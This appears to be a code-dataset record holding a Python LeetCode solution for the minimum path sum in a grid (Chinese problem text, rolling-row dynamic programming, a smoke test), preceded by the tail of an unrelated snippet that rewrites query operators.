        # the strings above use '!=' today, but confirm before adding one.
        self.selections_pd = OrderedDict()
        for k, v in self.selections.items():
            vv = v.replace('&', 'and').replace('|', 'or').replace('!=', 'not').replace('!', 'not')
            self.selections_pd[k] = vv
"[email protected]"
] | |
7efb8ef9da9d77a2dea29542cdfeae246c6ad6d6 | a2b6bc9bdd2bdbe5871edb613065dd2397175cb3 | /Cookbook/Array/最小路径和.py | 8fcbf61420a03b424278ab65480d35b31e907523 | [] | no_license | Asunqingwen/LeetCode | ed8d2043a31f86e9e256123439388d7d223269be | b7c59c826bcd17cb1333571eb9f13f5c2b89b4ee | refs/heads/master | 2022-09-26T01:46:59.790316 | 2022-09-01T08:20:37 | 2022-09-01T08:20:37 | 95,668,066 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,076 | py | '''
给定一个包含非负整数的 m x n 网格 grid ,请找出一条从左上角到右下角的路径,使得路径上的数字总和为最小。
说明:每次只能向下或者向右移动一步。
示例 1:
输入:grid = [[1,3,1],[1,5,1],[4,2,1]]
输出:7
解释:因为路径 1→3→1→1→1 的总和最小。
示例 2:
输入:grid = [[1,2,3],[4,5,6]]
输出:12
提示:
m == grid.length
n == grid[i].length
1 <= m, n <= 200
0 <= grid[i][j] <= 100
'''
from typing import List
class Solution:
    def minPathSum(self, grid: List[List[int]]) -> int:
        """Return the minimal sum of a path from the top-left to the
        bottom-right of *grid*, moving only right or down (LeetCode 64).

        Unlike the previous version, the caller's ``grid`` is left
        unmodified: the DP is carried in a single rolling row.
        """
        # dp[c] holds the best path sum to cell (current row, c).
        dp = list(grid[0])
        for c in range(1, len(dp)):
            dp[c] += dp[c - 1]
        for r in range(1, len(grid)):
            # First column can only be reached from above.
            dp[0] += grid[r][0]
            for c in range(1, len(dp)):
                dp[c] = grid[r][c] + min(dp[c], dp[c - 1])
        return dp[-1]
if __name__ == '__main__':
    # Ad-hoc smoke test: expected output is 7 (path 1 -> 3 -> 1 -> 1 -> 1).
    grid = [[1, 3, 1], [1, 5, 1], [4, 2, 1]]
    sol = Solution()
    print(sol.minPathSum(grid))
| [
"[email protected]"
] |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.